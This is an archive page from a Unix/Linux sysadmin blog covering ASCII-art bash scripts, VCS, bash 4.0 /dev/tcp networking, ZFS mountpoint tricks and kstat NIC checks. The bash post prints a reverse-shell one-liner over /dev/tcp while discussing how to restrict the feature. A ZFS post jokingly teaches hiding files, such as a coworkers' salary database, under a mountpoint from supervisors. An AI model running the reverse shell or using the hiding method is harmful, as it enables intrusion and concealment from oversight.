Sunday, February 15, 2009

More Valentine's ASCII Art For Linux And Unix

Happy Day-After-Valentine's Day :)

Again; also Happy day-after-the-famous massacre and Happy day-after-"Just in case you forgot, you're single" day ;)

Since copy for this blog gets written a day in advance (at the latest) I split up my two favorite pieces of ASCII Valentine's art so that I could spend Valentine's day with my wife instead of having to take any time away to write copy for the day after, which is today, for those of you keeping score at home (???) You know what I mean.

I also found this ASCII picture on Asciiworld.com and, hopefully, all of you fans of ASCII art (I include myself) have been over there to check out the huge amount of great pix they have or will be doing so one day. Don't mention my name if you need to contact them, though. If they're selling anything and you make that mistake, they'll probably charge you double ;)

Hope you like this one. It gets harder to read the larger it is, but it's still pretty cool and, possibly, subliminal. Don't leave this anywhere you don't want to be loved ;)

Surgeon General's Warning: ASCII art may cause dyspepsia, dipsomania and/or spontaneous aggrivated peristalsis. Click the picture below with care, and make sure you're wearing clean skivvies ;)

More Valentines ASCII art

#!/bin/bash

#
# hvd2.sh - Happy Day-After-Valentine's Day To My Still Wonderful Wife :)

echo -en "::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n::::::::::OOO\$MOOO::::::::::::OOOOOOOOOO::::::::::::::::::::::::::::::::::::\n::::::::OO\$MM MMMMOOOO::::OOOMMMMMMMMMMMOO:::::::::::::::OOOOOOO::::::::::::\n::::::OOMM   \$\$M\$MMM\$OO::OMMMMOM  OM\$\$\$\$MMOO::::::::::::::::O:::::::::::::::\n:::::OMMM  \$\$\$\$\$\$\$MMMMOOOOMMM\$\$  \$MM\$MMM\$MM\$O:::::::::::::::O:::::::::::::::\n::::OMMMM M\$MM\$MM\$\$\$MMMMMMMMMO  O\$\$\$\$M\$MM\$MMMO:::::::::::OOOOOOOO:::::::::::\n::::OM\$\$M M\$\$\$\$\$\$\$\$\$O\$MMMMMM\$  \$O\$\$\$\$MM\$M\$\$MMOO:::::::::::::::::::::::::::::\n::::OM\$O\$\$\$\$\$\$\$\$\$\$\$\$\$\$O\$MO\$\$O\$\$\$\$\$\$\$\$\$\$\$O\$\$MMOO:::OOOO::::::::::::::::::::::\n::::OM\$\$\$\$MMO\$\$\$\$\$\$\$O\$\$\$\$\$\$O\$\$O\$\$\$\$\$\$M\$M\$\$MM\$O:::O:::O::::::::::::::::::::::\n:::::M\$\$OO\$M\$\$\$\$O\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$M\$\$MOMM\$O:::O::O:::::::::::::::O:::::::\n:::::MMM\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$OO\$\$\$MMMMO::OOOOO:::::OOOO:O::::O::OOO:::\n::::::OMM\$\$O\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$M\$MMO:::::O:::::::O::O:O:::O::O::O:::\n:::::::OMM\$\$\$M\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$MMMMMMO::::::O:::::::O::O::O:O:::OOO::::\n::::::::OOMM\$\$M\$ \$\$\$\$\$\$\$\$\$\$\$\$\$\$\$ M\$\$\$MM\$OO::::OOOOO:::::::OOO:::O::::O::::::\n:::::::::OOM\$\$\$\$M \$\$\$\$\$\$\$\$\$\$MM\$ \$\$\$\$MM\$\$O::::O:::OOOOO::::::::::::::::OOO:::\n:::::::::::OMMM\$\$\$ \$\$\$\$\$\$\$\$\$\$\$ \$\$\$\$\$MMOO:::::OOOO:::::OOOOO:::::::::::::::::\n:::::::::::::O\$MM\$\$ \$\$\$\$\$\$\$\$\$ \$\$\$\$\$MMO:::::::::::::::::::::::::::::::::::O::\n::::::::::::::OOMMM\$  M\$\$\$\$  MM\$\$MMO::::::::::::::O:::::O:::OOO::O:::O:::O::\n::::::::::::::::OMM\$\$\$     \$M\$\$MMO::::::::::::::::OO:::OO::O::O::O:::O:::O::\n:::::::::::::::::OMM\$\$O\$\$\$\$M\$\$\$MM:::::::::::::::::::OOOO:::OOOO:::OOOO:::O::\n::::::::::::::::::O\$MM\$\$\$O\$\$\$MMM:::::::::::::::::::::OO:::::::::::::::::::::\n::::::::::::::::::::O\$MMM\$\$\$MMO::::::::::::::::O::::OO:::::::::::::::::::O::\n:::::::::::::::::::::OO\$\$MM\$O:::::::::::::::::::OOOOO:::::::::::::::::::::::\n:::::::::::::::::::::::OO\$OO::::::::::::::::::::::::::::::::::::::::::::::::\n"


, Mike



Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!


Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Posted by Mike Golvach at 12:44 AM Edit Post Message

, , , , , , ,

Saturday, February 14, 2009

Valentine's Day Linux And Unix ASCII Art

Happy Valentine's Day :)

Although this holiday is heavily associated with a famous massacre and referred to by a good percentage of the general population as "Just in case you forgot, you're single" day, it's still up there with the biggies (If Hallmark ever figures out how to work Jesus into the celebration, they'll have a real hit on their hands ;)

No matter if you're in a relationship or find yourself alone this Valentine's day, you can make this holiday work for you. If you're involved, send a card (or do something nice) for your partner. If you're single, do something nice for yourself and enjoy this time in your life. Eventually, you will reminisce fondly about your independence. Sad, but true ;)

Now that I've spread the sweet perfume of romance in the air (or spread something ... thick ;) let's get to the pretty ASCII art. The ASCII art script, tagged to the bottom of this post, was picked up from Asciiworld.com, where they have a great collection of ASCII art which encompasses far more than just Valentine's day pictures. Go check out the ASCII World and see if you can't find something interesting to send to friends, family, even bitter enemies ;)

Happy Valentine's Day, again, and I hope you enjoy this bad boy. This time we added   HTML entities to maintain the spacing that Blogspot generally eradicates :)

NOTE: Click on the picture below for a whole lotta love ;)

Valentines Day ASCII Art

#!/bin/bash

#
# hvd.sh - Happy Valentine's Day To The Love Of My Life - My Wonderful Wife :)


echo -en "\thugs&kisses&hugs&kisses&hugs&kisses&hugs&kisses&hugs&kisses&\n\t&            hugs&kisses&hugs&kisses&hu         &hugs&kisses\n\ts&h        es&hugs&kisses&hugs&kiss                 gs&kisse\n\tes&h      sses&hugs&kisses&hugs&k                     s&kiss\n\tses&      isses&hugs&kisses&hugs            &kiss      s&kis\n\tsses      kisses&hugs&kisses&hu           ugs&kiss      s&ki\n\tisse      &kisses&hugs&kisses&h          &hugs&kiss     gs&k\n\tkiss      s&kisses&hugs&kisses&         es&hugs&kis     ugs&\n\t&kis      gs&kisses&hugs&kisses        sses&hugs&k      hugs\n\ts&ki      ugs&kisses&hugs&kisse       kisses&hugs       &hug\n\tgs&k      hugs&kisses&hugs&kiss      s&kisses&hu        s&hu\n\tugs&      &hugs&kisses&hugs&kis     ugs&kisses&         es&h\n\thugs      s&hugs&kisses&hugs& i     hugs&kisse          ses&\n\t&hug      es&hugs&kisses&hug  k      hugs&kis           sses\n\ts&hu      ses&hugs&kisses&h   &       hugs&             isse\n\tes&h      sses&hugs&kisse     s&                       &kiss\n\ts                             gs&ki                 hugs&kis\n\ts                             ugs&kisse         sses&hugs&ki\n\ti             ses&h                                        k\n\tk             sses&                                        &\n\t&kis      gs&kisses&hug   isses&hugs      s&hugs&kisse     s\n\ts&kis      gs&kisses&h   &kisses&hug      es&hugs&kisses   g\n\tgs&ki      ugs&kisses&   s&kisses&hu      ses&hugs&kisses  u\n\tugs&ki      ugs&kisse   ugs&kisses&h      sses&hugs&kisses h\n\thugs&k      hugs&kiss   hugs&kisses&      isses&h gs&kisses&\n\t&hugs&k      hugs&ki   s&hugs&kisses      kisses  ugs&kisses\n\ts&hugs&      &hugs&k   es&hugs&kisse              hugs&kisse\n\tes&hugs&      &hugs   sses&hugs&kiss      s&kiss  &hugs&kiss\n\tses&hugs      s&hug   isses&hugs&kis      gs&kiss s&hugs&kis\n\tsses&hugs      s&h   &kisses&hugs&ki      ugs&kisses&hugs& i\n\tisses&hug      es&   s&kisses&hugs&k      hugs&kisses&hug  k\n\tkisses&hug      e   ugs&kisses&hugs&      &hugs&kisses&h   &\n\t&kisses&hu          hugs&kisses&hugs      s&hugs&kisse     s\n\ts&kisses&hu        s&hugs&kisses                           g\n\tgs&kisses&h        es&hugs&kisse                           u\n\tugs&kisses&hugs&kisses&hugs&kisses&hugs&kisses&hugs&kisses&h\n"


, Mike



Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!


Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Posted by Mike Golvach at 12:50 AM Edit Post Message

, , , , , , ,

Friday, February 13, 2009

Correcting Auto-Disabled Service Groups In Veritas Cluster Server

Hey there,

Today's post is going to be fairly specific. I'm either tapped-out on creativity or I'm writing this post after working into the night, or both ;) Here's a little something I picked up today concerning VCS and service groups for either the Unix or Linux version.

If you've ever wondered why, every once in a while, when you have a VCS service group problem and you get this error when you try to correct it:

service group is auto-disabled in the cluster!

you may have had a nervous breakdown at some point in your life ;) Adding to the confusion is that the default help output for the hagrp command only shows an autodisable option (? Either that or I was really tired while I was troubleshooting)

Now, there are good reasons for your service group to go into this state. It doesn't just do it to piss you off ;) For instance, if the basic VCS service (or engine) isn't running on a particular node in your cluster, this attribute gets set. That way, if it comes back online unexpectedly (or someone unexpectedly brings it online while you're working on something else in the VCS config) it won't start contending for resources and causing a possibly more confusing situation. It'll also do this if none of the resources in a service group have been probed (also generally indicative of a "bad bad failure") and if you lose all of your high priority heartbeats. Technically, I think it only does this when you only have disk heartbeats left, but I believe it also does it if you get down to having just one low priority link active and don't use disk heartbeats (I could test this out, but then I might have to keep working until tomorrow morning. I'm at the point where senseless voodoo-thinking has taken over ;)

Luckily, it's a really simple situation to fix, if you know the service group shouldn't be disabled and/or you need to bring an autodisabled service group up. The command line that does that is:

host # hagrp -autoenable YOUR_SERVICE_GROUP_NAME -sys THE_NODE_YOU_WANT_TO_AUTOENABLE_THE_SG_ON

Another way to get around this is to manually probe all of the resources in that service group. It seems like a waste of time to me, but I'm glad the option exists, just in case the above command line fails to do the trick for one reason or another.

host # hares -probe RESOURCE_NAME -sys NODE_YOU_WANT_TO_PROBE_RESOURCE_ON

I find this can be made somewhat simpler by using "hares -display," and piping that to a grep and awk statement, although doing this could result in errors that can end up making your life even more miserable if you don't put in extra echo statements to list out what exact resources are being probed!

And, as my exit nears, another way to do this is to simply use your /etc/VRTSvcs/conf/config/main.cf (assuming it has service groups in it that aren't autodisabled) and get the command line (same as above) by using hacf:

host # hacf -cftocmd /etc/VRTSvcs/config/config/

This will produce a file named "main.cmd", and you can then just "grep -i able" out of it and you should have one line in there, at least, that prints out the exact command you need to run (with your specific service group and system name some times) to unset that flag (or attribute)

Here's to a happy Valentine's day, tomorrow, for almost all of you ;)

Cheers

, Mike



Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!


Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Posted by Mike Golvach at 12:00 AM Edit Post Message

, , , , , , ,

Thursday, February 12, 2009

When Features Attack: Bash Version 4.0.0(1)-rc1

How do?,

Before we get started today, I just wanted to reflect on our posts' introductions. Usually it's "Hey there," or something to that effect. Being one of those people who are bothered by redundancy (at least, after the 50th time ;) this is the one part of blog posting I find the most grating. And, since everything reminds me of a George Carlin quote, I think he put it pretty well in this little paragraph about saying goodbye to your fellow man (from "Napalm And Silly Putty"):

Then have you noticed this, you get in a rut with the way you say goodbye. You ever find yourself using the same phrase over and over again with everybody, you feel a little stupid. Like if you're leavin' a party, and you have to say goodbye to five people, you say, "OK, hey take it easy, OK, hey take it easy, OK, hey take it easy..", you feel like a goddamn moron, ya know? So you know what I do? Every month, I change the way I say goodbye. Whether I need to or not, every month I start using a different phrase. People notice that. They appreciate that extra effort. They'll say to me, "Pardon me, didn't you used to say, 'OK, hey take it easy'". I say, "Yes I did. but not anymore." Now I say "Farewell". Farewell 'til we meet again, Peace be with you. May the forces of evil become confused on the way to your house. That's a strong one, isn't it? People will remember you if you talk like that. Then sometimes you can combine certain ways to say goodbye that don't really seem to go together, like, "Toodle-oo, go with God, and don't take any wooden nickels." Then people don't know what the fuck you're talking about! Or you can say goodbye in a realistic manner. "So long Steve, don't let self-doubt interfere with plans to improve your life." Well, some people need practical advice.


Anyway, that being said, my options are somewhat limited, since I'm old enough to feel silly saying (or writing) things like "Word," or "What's the haps?" The first one is slang that just doesn't belong to my generation. I might find it amusing, but, at the same time, it seems like it might be confusing or taken the wrong way. The second one seems to have come around within the last year or so and, despite its down-home flavour and growing presence, I've yet to meet anyone who's actually ever said it and, to be quite honest, whenever I read that greeting in an email I mentally envision a middle-aged white man tragically out of touch with the youth culture of today and, also tragically, clamoring out in a weak last-ditch effort to stay hip. I pretty much understand everything most kids say to each other, but I've never felt the need to incorporate any of it into my own dialogue. The only exception is if I'm being sarcastic, which the kids pick up on immediately. They're not stupid and they can smell desperation. I would imagine that they (as I did when I was younger) look to the adults among them for some sense of normalcy, even in the form of language. As a parent, I don't discourage my kids from "fitting in," but I do try to provide a point of reference for them so they can go out into the world and speak intelligently to the older people that will be signing their paychecks (unless they're paying themselves, in which case they're either incredibly successful or possibly schizophrenic ;) Anyway, that being said (damn it! ...redundancy again ;), let's get on with this post. I'm getting farther and farther off-topic. It's a good thing I'm not getting paid for this ;)

On-topic (although this post is much less interesting than the Fox special where the latest build of bash mauls one of its handlers on film ;) I finally found some time and compiled version 4.0.0(1)-rc1 which, I believe, is the latest release out there right now (I could very well be wrong, as I completely missed 4.0-beta2). One of the first things I noticed when looking at the configurable options is that the ability to access the network via Bash's /dev/tcp networking functionality is now an actual option ( --enable-net-redirections ) to configure. When I saw this, I thought two things:

1. Although this used to be enabled by default (which sparked some controversy) , now you have to specifically add it when you build. Of course, conversely, you can specifically exclude it, as before, which leads to the next point...

2. With regards to disabling the net redirection feature, I'm curious if it's a more secure implementation or if it's just being "recognized." Part of me figures that security issues will probably continue to exist with this feature, or it wouldn't be disabled by default. This way, anyone who wants to compile on their own, isn't aware of any of the security risks, and just does a robotic-build (./configure;make;make install - or, and I can't be certain of this, installs the default-build rpm, dpkg, pkg, etc) won't be vulnerable. I've seen a lot of debate on the blogs and boards about whether or not bash's implementation of net redirects is, in fact, a real security risk. For instance, labs.neohapsis.com has this nice online tutorial on how to connect back to the shell using bash net redirects. If you don't want to hop over there, I tested this with net redirects built into bash 4.0.0(1)-rc1 and it still works:

host # exec /usr/local/bin/bash 0</dev/tcp/host/514 1>&0 2>&0

HAPPY NOTE: If you're stuck with any bash version (or pre-compiled OS package), you can still - for the most part - disable bash's net redirect functionality (except in the case of the root user and/or anyone with equal system privilege) in, probably, more than one way. Check out our old post on securing /dev/tcp and /dev/udp if your OS allows you to set extended file access control lists. Restricting the permissions on /dev/tcp and /dev/udp to that extent doesn't actually remedy the underlying situation, but it does make it a lot harder to exploit.

I've included a combo-script (built from various older ones we've posted before) so that you can test your system/OS's behaviour when implementing this functionality with the latest version of bash. I'll probably be goofing around with this a lot in the near future ( although I promise not to bother you with every boring detail ;), as it could make some of our older bash scripts much tighter and outside-software-independent if it proves out.

Farewell 'til we meet again, Peace be with you. May the forces of evil become confused on the way to your house ;)

P.S. In the pictured output below, I used "www.tinyurl.com" for the httpserver variable so it would get the 301 redirect and you'd be able to see all the output from the script. If you run this script against "tinyurl.com" you'll get back the entire page, which runs a bit long)

Click on the picture below for the fun-sized version ;)

Output from bash net redirect script

Cheers,


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License

#!/bin/bash
#
# httpg11
#
# 2009 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

#
# Just edit these to your preferences -
# $domain should just be the domain.com part of your $mailserver address
#

mailserver="mail.domain.com"
domain="domain.com"
httpserver="www.tinyurl.com"

echo "Testing mail server functionality"
exec 9<>/dev/tcp/$mailserver/25
read -r server_version <&9
echo "Server reports it is: $server_version"
echo "HELO $domain" >&9
read -r greeting <&9
echo "Server responded to our hello with: $greeting"
echo "VRFY username" >&9
read -r vrfy_ok <&9
echo "Server indicates that this is how it feels about the VRFY command: $vrfy_ok"
echo "quit" >&9
read -r salutation <&9
echo "Server signed off with: $salutation"
echo "Dumping any remaining data in the file descriptor"
cat <&9 2>&1
echo "Closing input and output channels for the file descriptor"
9>&-
9<&-
echo "--------------------------------------------------"
echo "Testing web server functionality - Here it comes..."
exec 9<>/dev/tcp/$httpserver/80
echo "GET / HTTP/1.1" >&9
echo "Host: $httpserver" >&9
echo "Connection: close" >&9
echo "" >&9
while read line
do
echo "$line"
done <&9
echo "Dumping any remaining data in the file descriptor"
cat <&9 2>&1
echo "Closing input and output channels for the file descriptor"
9>&-
9<&-
echo "done"


, Mike



Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!


Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Posted by Mike Golvach at 12:31 AM Edit Post Message

, , , , , , ,

Wednesday, February 11, 2009

Volume 3 Of The Linux/Unix SysAdmin Covert File Storage Method

Cheers,

Today's post is the third volume in our series on covert file storage. If you're interested in reading up on the 57th installment of this series, please feel free to click the link that's way behind the anchor text right here ;) Today, we're going to be looking at the tip discussed in volume 57, but with respect, specifically, to the ZFS filesystem. The meaning of those initials is included in the hyperlink, again, preceding the sentence that should land you at your anchor text. Of course, one connecting theme of these three posts is that everything is out of order; hence the signature sign-off in place of the usual greeting. We're trying really hard to be clever and, if we're lucky, we'll unintentionally create a perpetually-looping self-parody that unexpectedly creates infinite depths of recursion as we explore the meaning of the meaning of the meaning of... In the meantime, we'll plow straight ahead and bring you Volume 3 (which, of course, is the second entry) in our series of posts on hiding things in and under your Unix or Linux partitions and overlay-mounts (one's the same as the other but the other isn't necessarily the same as the one ;)

This post's twist is that we'll be specifically approaching hiding data in ZFS mountpoints. For the purposes of our demonstration and experimentation, we'll assume that the version of ZFS we're using is the one that roughly corresponds with the date of this post. If any feature mentioned didn't work a year ago, or you're reading this in the future and find yourself disgusted with the lack of an "obvious" and simple solution that didn't exist yet, we beg your pardon. This blog is written in the present (over and over and over again), edited in the very near relative-future and published before the aforementioned activities become distant recollections from the past ;)

Again, you can refer to our previous post on finding space hogs on multiple-overlay mountpoints if you want to look into that aspect a little bit deeper. Also, we'll be using the /usr/local overlay mount, mounted on top of /usr, for our models.

ZFS is actually quite a robust files system and is improving with each release. One really nice thing about it is that it's available for both commercial Solaris and OpenSolaris, so we don't have to exclude the open source community in this post like we have to with most of our Solaris posts. You're always welcome to read of course, but we prefer to only advertise or offer-up relevant content to our readers (Meaning that, since most of our traffic has been (and still is) the result of shameless self-promotion -- but, thank you Google for indexing us! -- we try not to forget to fail to "drop bombs" on purely Open Source forums when we write about proprietary, and unbelievably costly, Operating Systems).

Today's experiment will have us butting into a few problems along the way. But we'll still be able to get away with hiding our stuff. Like Rocky Balboa, we're about to be repeatedly punched in the face (and if you've ever seen that movie, you know that he gets hit around 70 or 80 times at full-force in the last fight alone) and yet still manage to lose the fight... okay; that was a bad allegory, not to mention a bad analogue. Think "Rocky II" instead. He get's his face smashed in some more, but we're pretty sure he wins at the end of that movie ;)

Step 1: Take stock of your surroundings. You're going to, first and foremost, ensure that the information you're hiding won't be compromised by the little things (like putting big things in small spaces or using big spaces with little room to store any things ;) Just like in the 57th method, we've got it pretty good, with regards to the amount of space available on /usr. The space on /usr is, ultimately, more important than the space available on /usr/local, since that's were our hidden files will actually reside and any changes in size might get noticed by tools like "du,""df" or the people who get paid to keep an eye on you (Sorry - that one was just way too easy to let it go ;)

Since our example output (aside from the ZFS-specific errors) will be the same, we're going to assume the example output from our post on the 57th method, which you can refer back to, before this post gets even longer than way-too-long!

Step 2: Pry that floorboard loose. This is where you still have to be nimble, and is one part of this operation that you'll want to execute as quickly as possible (putting everything back to normal would be the other thing you want to do quickly. Restoration of seeming-normality in as little time as possible is key).

First, we'll unmount the /usr/local filesystem, which leaves us with "df -k" (or "df -whatever" - however you like it) showing that /usr/local is now simply a directory on the /usr mountpoint. It's no longer a mountpoint, which is good. If you haven't been storing stuff here already, the directory should be empty.

Step 3: Throw all that stuff you're not supposed to have into the /usr/local directory and then nail the floorboards back down by remounting /usr/local.

NOTE: This is where ZFS bites you in the arse, if you've set it up using its defaults. Now you're in it deep because you're half-invested in a conspiracy to cover something up (we won't judge) and you have to decide if you want to put off until the future what you could figure out today, or just figure everything out right now.

An important distinction to be made at this point is that ZFS doesn't use the standard "mount" and "umount" commands that, say, UFS, does. It uses the very-similar "zfs mount" and "zfs umount" commands, instead. Assuming that your ZFS filesystem is a default ZFS filesystem and you've run the following commands (so far), you'll get the error at the end of the output below:

host # zfs umount rootdg/usr/local <-- NOTE HERE: The ZFS filesystems are part of a data pool or dataset, so the output looks slightly different in df, mount, du, etc.
host # mv /tmp/coworkers_salaries.db /usr/local/.
host # zfs mount rootdg/usr/local
cannot mount '/usr/local': directory is not empty <-- Also notice that the error message will usually use the "mountpoint" name as opposed to the "dataset" name. In this instance, the mountpoint /usr/local is actually mounted on rootdg/usr/local.

OUCH! Now the important thing to do is not to be like Rocky! Completely ignore Mickey while he calls you a tomato and goes on to explain some insanity about how he's not running some goddamn soup kitchen ;) You can escape from this situation - on the fly - quite easily if you know your command line options (or look them up really quickly):

host # zfs mount -O rootdg/usr/local
host #

Phew...

Step 4. Ensure everything looks good, and, if you have the time, consider one other option that might make your life easier later on (although it may draw unwanted attention. Each situation is unique. If your boss and/or co-workers are paranoid, they're probably out to get you and are all in on it ;) If you're reasonably confident you have a good excuse prepared and can set this up (if you'll permit us one more chug of spite from the "Rocky" well), Mickey also told you to keep hitting that bastard in the ribs, ya see? "Don't let him breathe." Your ZFS filesystem can be modified to keep your future covert operations more efficient. We'll look at that before we bid you adieu, since statistics show that the average human's attention span is ...something less than optimal. The specifics are fuzzy, but it's definitely not "above average" ;) That sentence couldn't have made more sense, by adhering to its own logic, if we paid it to...

The way to do this is, of course, to make your ZFS filesystems into legacy filesystems, rather than remembering to use "-O" at the command line every time (which won't work on a reboot or automated remount), and keep them that way! This other method doesn't rob you of all of the benefits of ZFS, but does make it so that commands like "zfs mount -a" won't auto-mount your ZFS mountpoint. In fact, "zfs mount" won't work for that mountpoint anymore, and you'll need to include it in /etc/vfstab, just like the UFS and VXFS, etc, filesystems if you want it to mount at boot, etc. So, for our rootdg/usr/local filesystem/mountpoint/dataset, we'll need to do the following (and you'll see how incredibly obvious this move can be ;)

host # zfs set mountpoint=legacy rootdg/usr/local
host # mount -F zfs rootdg/usr/local /usr/local

Actually, that isn't "so" bad, but, as we mentioned, if you want to automate this, you'll need to add a line to /etc/vfstab that looks odd and out of place:

rootdg/usr/local -  /usr/local     zfs  -  yes  -


This is particularly easy to spot because the logical device has a different format than most (/dev/dsk/c0t0d0s0, for example) and the "device to fsck" and "fsck pass" columns are both not used and need to be set to "-" rather than the standard "/dev/rdsk/c0t0d0s0" and "1" that might usually go there. Also, and this is the worst part, you have to put the name of the filesystem in there, so "zfs" is spelled out right in the middle of the entry. Nasty...

Step 5: Make sure things look relatively the same, so you don't get in trouble, and walk away. Don't look back. People who regret past decisions often look over their shoulders compulsively. Most people know this even if they don't "know" that they know this. Kind of in the same way some folks might make you feel uneasy or suspicious, although you couldn't say for exactly what reason.

And bang, zoom; you're all set, yet again. Unless you're incredibly unlucky, or tragically misinformed, your stuff should be there waiting for you when you go to get it back.

Well be back with our final self-referencing 437th Issue in this three part series. As it began, so shall it start. As above, so it goes. When God opens one door, He closes another :)

Howdy,

, Mike



Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!


Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Posted by Mike Golvach at 12:30 AM Edit Post Message

, , , , , ,

Tuesday, February 10, 2009

Using Kstat To Check Your NIC Settings On Solaris 10 Unix

Aloha,

Hope you're having an enjoyable Friday and are looking forward to getting out of the office just as badly as I am. It's a long story, but I can't even begin to explain how close I came to just snapping like a twig and going incendiary on my cubicle, the office, the parking lot, the CostCo down the street and pretty much the entire business district. I swear; one more day of this and I might have ended up on the national news being brought down in a hail of bullets as entire Police departments and SWAT Teams on loan from neighboring states littered the urban landscape with speeding chunks of molten hot metal (killing the 100 or so odd "innocent" bystanders, of course). Thank God it's Friday. I never thought I'd ever say that and not feel like an imbecile, but, there you have it. I'm wasted. Worn out. Done. Through. The world has taken its sweet time this week and pummelled me like a crash-test dummy. One day at a time; that's what they say, right?

Hold the phone... I'm getting a late breaking news flash. It seems that today is actually Tuesday (??) Wait... no, it's Monday, definitely Monday (Dustin Hoffman, Rain Man, Judge Wapner, Jeopardy) and I'm writing Tuesday's copy. Okay... that, yes... that does mean that ...the work week has just begun... Man... that's... just... depressing... I... All right; buck up. Keep repeating: "I need this job. I need this job." Don't question authority, do what you're told, toe the line, don't buck the system, don't pass the buck, because the buck stops here. I guess I'll have to live up to the title of this post now... It appears I'm going to need Friday's paycheck. I can't possibly finance the kind of epic malfeasance I'm going to be burning to unleash, four days from now, on the change in my pocket and the fumes in my gas tank. So, hey :) Let's learn something we may already know :)

BTW (which means By The Way if you're too lazy to type the whole thing out, although the explanation kind of defeats the whole purpose... ;), the preceding two paragraphs were in jest. Seriously. I was only kidding, and I apologize to each and every one of you that came here for the few lines of actual cut-and-paste code and technical writing that follow. Of course, if you're a regular reader, you either enjoyed the above, hated it but couldn't stop reading (like not being able to look away from a car wreck, except, this is a just a bunch of words on a "page" and there aren't any cars involved ;) or just skipped right past it. If you're one of the last bunch, you're not even reading this right now, which means I could use this opportunity to make a few totally-uncalled-for remarks, but I won't. Just this once... On with the show :)

Today's we're going to take a look at using kstat on Solaris 10 ( It's actually available on Solaris 9, as well - I'm sure not sure, off the top of my head, about 8, but I think they were still using "netstat -k") to find out the three things you most often want to know about your network interface cards. Of course, the three things you'll want to be able to check on, arise from three separate problem-areas (which almost always get lumped together to some degree). Basically, you'd never need to know this stuff if your NIC's came, out-of-the-box, all cranking at the highest speed possible, transmitting as efficiently as possible and only engaging in worthwhile speed/transfer/protocol negotiations with upstream/downstream routers. But, hey, sometimes the world's not perfect ;)

1. How to check your NIC's link speed with kstat:

They say they sent you a Gig card, but you could swear it's chunking along at 100 meg. You're probably right (or really really really impatient ;), but it never hurts to know for sure (insofar as you can know anything for sure - BTW, be sure to check out my post-existential-emo-nihilist poetry at PleaseKillMeButDon'tMakeItHurt.com ;). This command line should give you that info (-m is the argument for your NIC driver type - might be ce or something else, and -i is for the instance of that driver. In this instance we're using the device driver bge0. -s is for the statistic you're looking up, if you want to specify that; which we do, for now):

host # kstat -m bge -i 0 -s link_speed|grep link_speed|awk '{print $2}'
1000

And, YES, according to the OS, that NIC (or that port, anyway) is performing to expectations. Running at a gig. Fantastic!

2. But, what about the duplex? This is a legitimate concern. I've actually never seen any card run at 1 gig half duplex, but it "is" possible, or they wouldn't account for it. You'll usually call duplex into question when you're running at 100 meg (on a gig-capable card and network) or 10 meg, given the same circumstances. This is easy to find out, too. Just hire a team of monkeys to hammer the keyboard until they come up with this sequence of characters ;)

host # kstat -m bge -i 0 -s link_duplex|grep link_duplex|awk '{print $2}'
2

Yet again, SUCCESS! If you wanted full duplex, anyway. That's what the 2 stands for. You could also end up with a 1 (half-duplex) or a 0 (which, technically, means your link is down. If you're not connected through serial console, ALOM, or something of that sort and you get this result, your version of kstat is either lying to you or it's hurt and confused ;)

3. And, finally, we should probably figure out if our NIC is set to auto-negotiate. This setting is less "definite" than the other two, since the folks who configure your network may require that your NIC be set to auto-negotiate, or (this happens a lot) train specifically to a determined speed and duplex. Auto-negotiation is always the easiest thing for both parties involved, if it works, but if you need to force your NIC to run at 100 meg full duplex and turn off auto-negotiation in order for your server to run on the network, that's that. You either do it or people start to wonder why they're paying you ;)

host # kstat -m bge -i 0 -s cap_autoneg|grep cap_autoneg|awk '{print $2}'
1

This is either great news or the beginning of a headache that could last weeks and drain you of whatever shattered will you have left ;) If you get a 1 back from this command, auto-negotiation is enabled (In a perfect world, you're Golden) and, if a 0 comes back, you're not doing any auto-negotiation.

If you want to change any of these values, check out this really old post we did on figuring out your NIC's speed and duplex on Solaris (to set the properties, just change the -get option for "ndd" to -set). It'll get you all sorted out :) And, yes, that post is somewhat similar to this one, but it's from November 2007 and we were still all hung up on using "netstat -k" to get our info back then ;)

Keep smiling. Even if it hurts ;)

Cheers,

, Mike



tbuskey noted this with regards to the kstat command and link speed attribute. Thanks!

This still depends on the hardware. EDITOR NOTE: For this card, tbuskey notes that ifspeed is what you should be looking for!

I have an nge card. kstat -m nge -i 0 | grep link
link_asmpause 0
link_autoneg 1
link_duplex 2
link_pause 0
link_state 1
link_up 1
link_duplex 2
link_state 1
$ kstat -m nge -i 0 | grep speed
bus_speed ifspeed 1000000000
ifspeed 1000000000


Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!


Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Posted by Mike Golvach at 12:20 AM Edit Post Message

, , , , , , ,

Monday, February 9, 2009

Getting Faster Support For Your VCS-Clustered NetBackup Servers

Hey There,

Today's post is a little trick that anyone running Veritas/Symantec NetBackup (Linux or Unix) on VCS - Veritas Cluster Server - should know. As the title suggests, doing this one little thing will almost guarantee you more responsive support from Symantec (given the highly specific situation outlined in the first sentence, of course ;). The funny thing, though, is that many people have this problem already; they just may not have had to deal with Symantec, with regards to it, yet.

The problem you have (or will have) to face is that Symantec "does not" fully support VCS Clustered NetBackup installations if that same cluster has other Service Groups and/or major resources active on it. I'd almost say that they don't support it at all, but that's not entirely true (just keep complaining. You'll see ;). However, Symantec's stated position is that they really "don't" support it at all (and this is only hearsay, of course. Something I've heard while on the phone with another person who answered the phone at the number listed on our contract for Symantec NetBackup Support. So, of course, I may not be entirely correct, here ...).

